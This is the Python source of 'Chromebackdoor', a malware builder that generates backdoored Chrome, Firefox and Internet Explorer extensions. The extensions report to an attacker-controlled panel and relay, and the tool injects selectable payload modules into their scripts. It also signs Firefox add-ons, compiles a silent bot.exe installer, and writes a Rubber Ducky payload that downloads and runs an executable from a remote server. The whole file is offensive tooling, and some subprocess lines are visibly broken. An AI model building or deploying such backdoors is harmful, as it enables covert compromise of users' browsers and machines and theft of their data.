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- #!usr/bin/env python3
- import os,sys
- import shutil
- import subprocess
- import random
- import glob
- import time
- import errno
- from crxmake import package
- class bcolors:
- HEADER = '\033[95m'
- OKBLUE = '\033[94m'
- OKGREEN = '\033[92m'
- WARNING = '\033[93m'
- FAIL = '\033[91m'
- ENDC = '\033[0m'
- BOLD = '\033[1m'
- UNDERLINE = '\033[4m'
- def ducky_payload():
- print bcolors.OKBLUE + "[+] Generate Rubber Ducky payload..." + bcolors.ENDC
- if os.path.exists("backdoor/rubber_ducky/payload.chromebackdoor"):
- open_file = open("backdoor/rubber_ducky/payload.chromebackdoor").read()
- if not os.path.exists("payload.txt"):
- open_payload = open("payload.txt", "a+")
- user_input = raw_input("Domain directory ($ ")
- if user_input == "":
- domain = "http://localhost/dir/"
- else:
- if not user_input.endswith('/'):
- user_input = user_input + "/"
- domain = user_input
- user_input = raw_input("Executable name (bot.exe)$ ")
- if user_input == "":
- executable = "bot.exe"
- else:
- executable = user_input
- content = open_file.replace("%server%", domain)
- content = content.replace("%exe%", executable)
- open_payload.write(content)
- open_payload.close()
- print bcolors.OKGREEN + "[+] Payload created : " + os.getcwd() + "/payload.txt" + bcolors.ENDC
- else:
- print bcolors.FAIL + "[!] Payload already here please delete " +os.getcwd() + "/payload.txt" + bcolors.ENDC
- else:
- print bcolors.FAIL + "[-] Payload maker not found" + bcolors.ENDC
- def logon():
- print """
- ____ _ ____ _ _
- / ___| |__ _ __ ___ _ __ ___ ___| __ ) __ _ ___| | ____| | ___ ___ _ __
- | | | '_ \| '__/ _ \| '_ ` _ \ / _ \ _ \ / _` |/ __| |/ / _` |/ _ \ / _ \| '__|
- | |___| | | | | | (_) | | | | | | __/ |_) | (_| | (__| < (_| | (_) | (_) | |
- \____|_| |_|_| \___/|_| |_| |_|\___|____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|
- VERSION 3.0 - - @graniet75
- """
- def show_plugins(backdoor = ''):
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Listing payloads..."
- listing = glob.glob('backdoor/plugins/*.chromebackdoor')
- current = 1
- for line in listing:
- if line != "":
- line = open(line).read()
- title = line.split('%title%')[1]
- print "["+bcolors.WARNING+"/"+bcolors.ENDC+"] "+str(current)+" -> " + title.split('%title%')[0]
- current+=1
- user_input = raw_input("[?] please select numbers ? ")
- if listing[int(user_input) - 1] != "":
- module_content = open(listing[int(user_input) - 1]).read().split("%content%")[1].split("%content%")[0]
- print "["+bcolors.OKBLUE+"*"+bcolors.ENDC+"]" + listing[int(user_input) - 1]
- oned = ""
- if oned == "":
- action = 0
- while action == 0:
- if backdoor == "":
- user_input = raw_input('[?] backdoor folder ? ')
- else:
- user_input = backdoor
- if user_input != '':
- if(os.path.isdir(user_input)):
- if not user_input.endswith('/'):
- user_input = user_input + "/"
- print "["+bcolors.OKBLUE+"*"+bcolors.ENDC+"] " + user_input
- action = 1
- if(os.path.isfile(user_input + 'iexplorer/script.js')):
- selected = "iexplorer"
- open_file = open(user_input + 'iexplorer/script.js').read()
- content = open_file.replace("//module",module_content +"\n//module")
- content = content.replace("%content%", "")
- new_file = open(user_input +'iexplorer/script.js',"w")
- new_file.write(content+"\n")
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] backdoor iexplorer writed !"
- elif(os.path.isfile(user_input + 'firefox/data/content.js')):
- selected = "firefox"
- open_file = open(user_input + 'firefox/data/content.js').read()
- content = open_file.replace("//module",module_content +"\n//module")
- content = content.replace("%content%", "")
- new_file = open(user_input +'firefox/data/content.js',"w")
- new_file.write(content+"\n")
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] backdoor firefox writed !"
- elif(os.path.isfile(user_input + 'server/js/check.js')):
- selected = "chrome"
- open_file = open(user_input + 'server/js/check.js').read()
- content = open_file.replace("//module",module_content +"\n//module")
- content = content.replace("%content%", "")
- new_file = open(user_input +'server/js/check.js',"w")
- new_file.write(content+"\n")
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] backdoor chrome writed !"
- def logo():
- print """
- _
- ___| |__ _ __ ___ _ __ ___ ___
- / __| '_ \| '__/ _ \| '_ ` _ \ / _ \
- | (__| | | | | | (_) | | | | | | __/
- \___|_| |_|_| _\___/|_| |_| |_|____| _
- | |__ __ _ ___| | ____| | ___ ___ _ __
- | '_ \ / _` |/ __| |/ / _` |/ _ \ / _ \| '__|
- | |_) | (_| | (__| < (_| | (_) | (_) | |
- |_.__/ \__,_|\___|_|\_\__,_|\___/ \___/|_|
- (c) Graniet - - @graniet75
- """
- def copy(src, dest):
- try:
- shutil.copytree(src, dest)
- except OSError as e:
- if e.errno == errno.ENOTDIR:
- shutil.copy(src, dest)
- else:
- print('Directory not copied. Error: %s' % e)
- def iexplorer():
- backdoor_information = {}
- backdoor_information['gate'] = "index.php"
- backdoor_information['output_dir'] = "backdoor/backdoor"
- backdoor_information['output_name'] = "/iexplorer"
- action = 0
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] IExplorer backdoor..."
- print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ please use HTTPS hosting for relais information."
- while action == 0:
- site = raw_input("[?] Website host (https://localhost/) ? ")
- if site == "":
- site = "https://localhost/"
- action = 1
- elif site.endswith('/'):
- action = 1
- else:
- site = site+"/"
- action = 1
- backdoor_information['site'] = site
- action = 0
- while action == 0:
- relais = raw_input("[?] Relais host (https://localhost/relais) ? ")
- if relais == "":
- relais = "https://localhost/relais"
- action = 1
- elif relais.endswith('/'):
- relais = relais[:-1]
- action = 1
- else:
- action = 1
- backdoor_information['relais'] = relais
- action = 0
- if(os.path.isfile('backdoor/iexplorer/script.js')):
- copy('backdoor/iexplorer/','backdoor/iexplorer_bk/')
- file_read = open('backdoor/iexplorer/script.js').read()
- if "//settings" in file_read:
- relais = backdoor_information['relais']
- code = file_read.replace("//settings", "\n\n var server_web = '"+site+"'\n var lock_page = '"+relais+"/lock.php' \n var gate_page = '"+relais+"/index.php'\n")
- file_write = open('backdoor/iexplorer_bk/script.js', 'w')
- file_write.write(code)
- file_write.close()
- copy('backdoor/iexplorer_bk/','backdoor/backdoor/iexplorer')
- copy('backdoor/web/','backdoor/web_bk/')
- file_read = open('backdoor/web/show.php').read()
- if "//settings" in file_read:
- panel = backdoor_information['site']
- code = file_read.replace('//settings', "var server_web = '"+panel+"'\n var gate_page = 'web/show.php'")
- file_write = open('backdoor/web_bk/show.php', 'w')
- file_write.write(code)
- file_write.close()
- #install_relais(panel)
- copy('backdoor/web_bk/','backdoor/backdoor/web/')
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Configure relais information..."
- copy('backdoor/relais/', 'backdoor/relais_bk/')
- file_read = open('backdoor/relais/index.php').read()
- if "//domain" in file_read:
- domain = backdoor_information['site']
- code = file_read.replace('//domain', '$domain = "'+domain+'";\n')
- file_write = open('backdoor/relais_bk/index.php','w')
- file_write.write(code)
- file_write.close()
- file_script = open('backdoor/relais/show_script.php').read()
- if "//domain" in file_script:
- code = file_script.replace('//domain', '$domain = "'+domain+'";\n')
- file_write = open('backdoor/relais_bk/show_script.php', 'w')
- file_write.write(code)
- file_write.close()
- copy('backdoor/relais_bk/','backdoor/backdoor/relais/')
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Successfully configure."
- show_plugins('backdoor/backdoor/')
- name_archive = str(random.randint(1,99999))
- shutil.make_archive(name_archive,'zip', 'backdoor/backdoor/')
- shutil.rmtree('backdoor/iexplorer_bk')
- shutil.rmtree('backdoor/web_bk/')
- shutil.rmtree('backdoor/relais_bk/')
- shutil.rmtree('backdoor/backdoor')
- print bcolors.OKGREEN+"Generation successful :"+os.getcwd()+"/"+name_archive+".zip"+bcolors.ENDC
- else:
- print "not here"
- def verify_xpi(information_array):
- output_name = information_array['output_name']
- FNULL = open(os.devnull, 'w')
- print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] checking USER-KEY..."
- config_file = open('config.conf').read()
- user_id = config_file.split('MOZ_API_KEY=')[1].split('#')[0]
- if user_id != '':
- print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] checking PRIV-KEY..."
- priv_key = config_file.split('MOZ_PRIV_KEY=')[1].split('#')[0]
- if priv_key != '':
- xpi_file = glob.glob(information_array['output_dir']+output_name+'/*.xpi')
- xpi_file = xpi_file[0]
- action = 0
- while action == 0:
- user_input = raw_input('[?] Directory for XPI load ('+os.getcwd()+') ? ')
- if user_input == '':
- user_input = os.getcwd()
- action = 1
- else:
- if os.path.isdir(user_input):
- action = 1
- print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] please wait..."
- try:
-["jpm", "-v", "sign", "--api-key="+user_id, "--api-secret="+priv_key, "--xpi="+xpi_file],stdout=FNULL, stderr=subprocess.STDOUT)
- print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] success sign xpi."
- time.sleep(100)
- except:
- print "["+bcolors.FAIL+"-"+bcolors.ENDC+"] Error on sign XPI"
- else:
- print "["+bcolors.FAIL +"-"+ bcolors.ENDC+"] Please configure account on config.ini"
- else:
- print "["+bcolors.FAIL +"-"+ bcolors.ENDC+"] Please configure account on config.ini"
- def generate_xpi(information_array):
- output_name = information_array['output_name']
- FNULL = open(os.devnull, 'w')
- print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] checking JPM..."
- try:
-["jpm"],stdout=FNULL, stderr=subprocess.STDOUT)
- print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] generate XPI file..."
-["jpm", "xpi",'--addon-dir='+information_array["output_dir"]+output_name+''],stdout=FNULL, stderr=subprocess.STDOUT)
- print "["+bcolors.OKGREEN +"+"+ bcolors.ENDC+"] XPI OK."
- except:
- print "["+bcolors.FAIL +"-"+ bcolors.ENDC+"] Error on JPM please install it."
- user_input = raw_input("[?] sign XPI ? [Y/n]")
- if user_input == '' or user_input == 'y' or user_input == 'Y':
- verify_xpi(information_array)
- def compile_payload(type):
- if type == "--chrome":
- payload_del = "installer/ch/test.crx"
- old_folder = "installer/ch/"
- new_folder = "installer/ch_bk/"
- elif type == "--ie":
- payload_del = "installer/ie/script.js"
- old_folder = "installer/ie"
- new_folder = "installer/ie_bk"
- try:
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Starting installer..."
-["wine", "start", 'installer/build.cmd'])
- walls = 0
- print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ If popup open please close with <"+bcolors.FAIL+"return"+bcolors.ENDC+"> input."
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Waiting bot.exe"
- time.sleep(20)
- while walls == 0:
- if os.path.isfile('installer/setup.exe'):
- copy('installer/setup.exe', 'bot.exe')
- os.remove('installer/setup.exe')
- os.remove(payload_del)
- copy(old_folder,new_folder)
- shutil.rmtree(old_folder)
- walls = 1
- print bcolors.OKGREEN+"Generate successful : "+os.getcwd()+"/bot.exe"+bcolors.ENDC
- user_input = raw_input("Generate Rubber Ducky payload [y/N]? $ ")
- if user_input == "Y" or user_input == "y":
- ducky_payload()
- except:
- print "["+bcolors.WARNING+"-"+bcolors.ENDC+"] Please install wine32"
- def executable_silent():
- user_input = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] backdoor type(--chrome,--ie) ? $ ")
- if user_input == "" or user_input == "--chrome":
- action = 0
- while action == 0:
- user_input = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] crx file ("+os.getcwd()+"/mycrx.crx) ? ")
- if user_input != "" and os.path.isfile(user_input):
- action = 1
- copy(user_input,'installer/ch_bk/test.crx')
- os.rename('installer/ch_bk/','installer/ch/')
- #backdoor_name = glob.glob('installer/ch/*.crx')[0]
- #print backdoor_name
- compile_payload('--chrome')
- elif user_input == "--ie":
- action = 0
- while action == 0:
- user_input = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] script file for ie payload (script.js) ? ")
- if user_input != "":
- if os.path.isfile(user_input):
- action = 1
- copy(user_input,"installer/ie_bk/script.js")
- os.rename('installer/ie_bk/', 'installer/ie/')
- compile_payload('--ie')
- def install_firefox_server():
- backdoor_information = {}
- backdoor_information['gate'] = "index.php"
- backdoor_information['output_dir'] = "backdoor/backdoor"
- backdoor_information['output_name'] = "/firefox"
- action = 0
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Firefox backdoor..."
- print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ please use HTTPS hosting for relais information."
- while action == 0:
- site = raw_input("[?] Website host (https://localhost/) ? ")
- if site == "":
- site = "https://localhost/"
- action = 1
- elif site.endswith('/'):
- action = 1
- else:
- site = site+"/"
- action = 1
- backdoor_information['site'] = site
- action = 0
- while action == 0:
- relais = raw_input("[?] Relais host (https://localhost/relais) ? ")
- if relais == "":
- relais = "https://localhost/relais"
- action = 1
- elif relais.endswith('/'):
- relais = relais[:-1]
- action = 1
- else:
- action = 1
- backdoor_information['relais'] = relais
- action = 0
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Generate Backdoor aspect."
- while action == 0:
- user_input = raw_input("[?] Name of extension ? ")
- if user_input != '':
- backdoor_information['name'] = user_input
- action = 1
- action = 0
- while action == 0:
- user_input = raw_input("[?] Description of extension ? ")
- if user_input != "":
- backdoor_information['description'] = user_input
- action = 1
- action = 0
- while action == 0:
- user_input = raw_input("[?] Version of extension ? ")
- if user_input != "":
- backdoor_information['version'] = user_input
- action = 1
- action = 0
- while action == 0:
- user_input = raw_input("[?] Icon of extension ("+os.getcwd()+"/backdoor/img/default.png) ? ")
- if user_input == '':
- backdoor_information['icon'] = user_input
- action = 1
- else:
- if os.path.isfile("/backdoor/img/" + user_input):
- backdoor_information['icon'] = user_input
- action = 1
- elif os.path.isfile(user_input):
- backdoor_information['icon'] = user_input
- action = 1
- action = 0
- copy("backdoor/firefox/","backdoor/firefox_bk/")
- open_manifest = open('backdoor/firefox/package.json')
- erase_bk = open('backdoor/firefox_bk/package.json', 'w').close()
- open_bk = open('backdoor/firefox_bk/package.json','a+')
- for line in open_manifest:
- if "//NAME_NB//" in line:
- line = line.replace("//NAME_NB//", str(random.randint(100,9999)))
- if "//NAME//" in line:
- print "ok"
- line = line.replace("//NAME//", backdoor_information['name'])
- if "//DESCRIPTION//" in line:
- line = line.replace("//DESCRIPTION//", backdoor_information['description'])
- if "//VERSION//" in line:
- line = line.replace("//VERSION//", backdoor_information['version'])
- open_bk.write(line)
- open_bk.close()
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] generate environement var..."
- open_server = open('backdoor/firefox/data/content.js')
- erase_server = open('backdoor/firefox_bk/data/content.js','w').close()
- new_server = open('backdoor/firefox_bk/data/content.js', 'a+')
- for line in open_server:
- if "//ENVVAR//" in line:
- server = backdoor_information['relais']
- gate = backdoor_information['gate']
- env = "var server_web='"+server+"';\n var gate_page='"+gate+"';"
- line = line.replace("//ENVVAR//", env)
- new_server.write(line)
- new_server.close()
- os.makedirs('backdoor/backdoor/')
- copy('backdoor/firefox_bk/','backdoor/backdoor/firefox/')
- generate_xpi(backdoor_information)
- copy('backdoor/web/','backdoor/web_bk/')
- file_read = open('backdoor/web/show.php').read()
- if "//settings" in file_read:
- panel = backdoor_information['site']
- code = file_read.replace('//settings', "var server_web = '"+panel+"'\n var gate_page = 'show.php'")
- file_write = open('backdoor/web_bk/show.php', 'w')
- file_write.write(code)
- file_write.close()
- copy('backdoor/web_bk/','backdoor/backdoor/web/')
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Configure relais information..."
- copy('backdoor/relais/', 'backdoor/relais_bk/')
- file_read = open('backdoor/relais/index.php').read()
- if "//domain" in file_read:
- domain = backdoor_information['site']
- code = file_read.replace('//domain', '$domain = "'+domain+'";\n')
- file_write = open('backdoor/relais_bk/index.php','w')
- file_write.write(code)
- file_write.close()
- file_script = open('backdoor/relais/show_script.php').read()
- if "//domain" in file_script:
- code = file_script.replace('//domain', '$domain = "'+domain+'";\n')
- file_write = open('backdoor/relais_bk/show_script.php', 'w')
- file_write.write(code)
- file_write.close()
- copy('backdoor/relais_bk/','backdoor/backdoor/relais/')
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Successfully configure."
- show_plugins('backdoor/backdoor/')
- name_archive = str(random.randint(1,99999))
- shutil.make_archive(name_archive,'zip', 'backdoor/backdoor/')
- shutil.rmtree('backdoor/firefox_bk')
- shutil.rmtree('backdoor/web_bk/')
- shutil.rmtree('backdoor/relais_bk/')
- shutil.rmtree('backdoor/backdoor')
- print bcolors.OKGREEN+"Generation successful :"+os.getcwd()+"/"+name_archive+".zip"+bcolors.ENDC
- def install_relais(domain):
- install_status = 0
- try:
- while install_status != 1:
- if domain.endswith('/'):
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Configure relais information..."
- copy('backdoor/relais/', 'backdoor/relais_bk/')
- file_read = open('backdoor/relais/index.php').read()
- if "//domain" in file_read:
- code = file_read.replace('//domain', '$domain = "'+domain+'";\n')
- file_write = open('backdoor/relais/index.php', 'w')
- file_write.write(code)
- file_write.close()
- file_script = open('backdoor/relais/show_script.php').read()
- if "//domain" in file_script:
- code = file_script.replace('//domain', ' $domain = "'+domain+'";\n')
- file_write = open('backdoor/relais/show_script.php', 'w')
- file_write.write(code)
- file_write.close()
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Successfully configure."
- output_filename = str(random.randint(1000,99999))
- if(os.path.isdir('backdoor/backdoor/')):
- shutil.rmtree('backdoor/backdoor/')
- os.makedirs('backdoor/backdoor/')
- copy('backdoor/web','backdoor/backdoor/web/')
- copy('backdoor/relais', 'backdoor/backdoor/relais/')
- copy('backdoor/server', 'backdoor/backdoor/server/')
- show_plugins('backdoor/backdoor/')
- package('backdoor/backdoor/server/', outfile='backdoor/backdoor/backdoor')
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Write crx..."
- print "| backdoor.crx writed."
- print "| backdoor.pem writed."
- shutil.make_archive(output_filename, 'zip', 'backdoor/backdoor/')
- shutil.rmtree('backdoor/backdoor/')
- shutil.rmtree('backdoor/web/')
- shutil.rmtree('backdoor/relais/')
- shutil.rmtree('backdoor/server/')
- shutil.move('backdoor/web_bk/', 'backdoor/web/')
- shutil.move('backdoor/relais_bk/', 'backdoor/relais/')
- shutil.move('backdoor/server_bk/', 'backdoor/server/')
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] New backdoor here : " + os.getcwd() + '/' +output_filename+'.zip'
- print "| Good hacking!\n"
- install_status = 1
- else:
- print "Please use correct url ex:"
- domain = raw_input('['+bcolors.OKBLUE+'?'+bcolors.ENDC+'] Website hosted (https://localhost/)? ')
- if domain == '':
- domain = "https://localhost/"
- except OSError as e:
- print('Directory not copied. Error: %s' % e)
- def install_server_chrome():
- try:
- get_url = 1
- while(get_url != 2):
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] chrome backdoor..."
- print "/"+bcolors.WARNING+"!"+bcolors.ENDC+"\\ please use HTTPS hosting for relais information."
- panel = raw_input('['+bcolors.OKBLUE+'?'+bcolors.ENDC+'] Website hosted (https://localhost/)? ')
- if panel == '':
- panel = "https://localhost/"
- print "| " + panel
- relais = raw_input('['+bcolors.OKBLUE+'?'+bcolors.ENDC+'] Website relais url (https://localhost/relais)? ')
- if relais == "":
- relais = "https://localhost/relais"
- relais_end = panel + relais
- relais_lock = relais_end + "/lock.php"
- relais_gate = relais_end + "/index.php"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Web : " + panel
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] Relais : " + relais
- input_user = raw_input("["+bcolors.OKBLUE+"?"+bcolors.ENDC+"] Information correct [Y/n]? ")
- if input_user == '' or input_user == 'y' or input_user == 'Y':
- get_url = 2
- if(os.path.isfile('backdoor/server/js/check.js')):
- copy('backdoor/server/','backdoor/server_bk/')
- file_read = open('backdoor/server/js/check.js').read()
- if "//settings" in file_read:
- code = file_read.replace("//settings", "\n\n var server_web = '"+panel+"'\n var lock_page = '"+relais+"/lock.php' \n var gate_page = '"+relais+"/index.php'\n")
- file_write = open('backdoor/server/js/check.js', 'w')
- file_write.write(code)
- file_write.close()
- copy('backdoor/web/','backdoor/web_bk/')
- file_read = open('backdoor/web/show.php').read()
- if "//settings" in file_read:
- code = file_read.replace('//settings', "var server_web = '"+panel+"'\n var gate_page = 'web/show.php'")
- file_write = open('backdoor/web/show.php', 'w')
- file_write.write(code)
- file_write.close()
- install_relais(panel)
- else:
- print "not here"
- except OSError as e:
- print('Directory not copied. Error: %s' % e)
- def help():
- print "["+bcolors.OKBLUE+"!"+bcolors.ENDC+"] Welcome to Chromebackdoor."
- print "--------------------------------------------"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --firefox : generate firefox XPI backdoor"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --chrome : generate GoogleChrome backdoor"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --ie : generate IE backdoor"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --build : generate silent executable"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --payload : show available payloads"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --binder : compact extension to extension"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] --rubber : create Rubber Ducky download & execute"
- print "--------------------------------------------"
- print "["+bcolors.OKGREEN+"+"+bcolors.ENDC+"] exemple:"
- print "| usage : python " + sys.argv[0] + " [CMD]"
- print "\n"
- def main():
- if(len(sys.argv) > 1):
- if(sys.argv[1] == "--chrome"):
- install_server_chrome()
- elif(sys.argv[1] == "--firefox"):
- install_firefox_server()
- elif(sys.argv[1] == "--build"):
- executable_silent()
- elif(sys.argv[1] == "--ie"):
- iexplorer()
- elif(sys.argv[1] == "--payload"):
- show_plugins()
- elif(sys.argv[1] == "--rubber"):
- ducky_payload()
- else:
- help()
- else:
- help()
- logo()
- main()
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